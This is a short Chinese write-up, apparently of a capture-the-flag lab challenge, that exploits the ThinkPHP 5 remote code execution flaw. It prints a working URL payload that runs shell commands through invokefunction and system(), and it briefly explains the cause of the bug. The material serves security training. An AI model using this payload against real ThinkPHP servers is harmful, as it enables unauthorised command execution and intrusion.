【愚公系列】2021年12月 攻防世界-进阶题-WEB-003(php_rce)

2021-12-27 08:12:01 浏览数 (1)

文章目录

  • 一、php_rce
  • 二、使用步骤
    • 1.点击获取在线场景
    • 2.thinkphp5 rce漏洞
  • 总结

一、php_rce

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.thinkphp5 rce漏洞

构造payload

执行ls命令查看当前目录文件

代码语言:javascript复制
?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("ls");'

当前目录没有flag文件,寻找flag

查看flag

flag为:flag{thinkphp5_rce}


总结

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

0 人点赞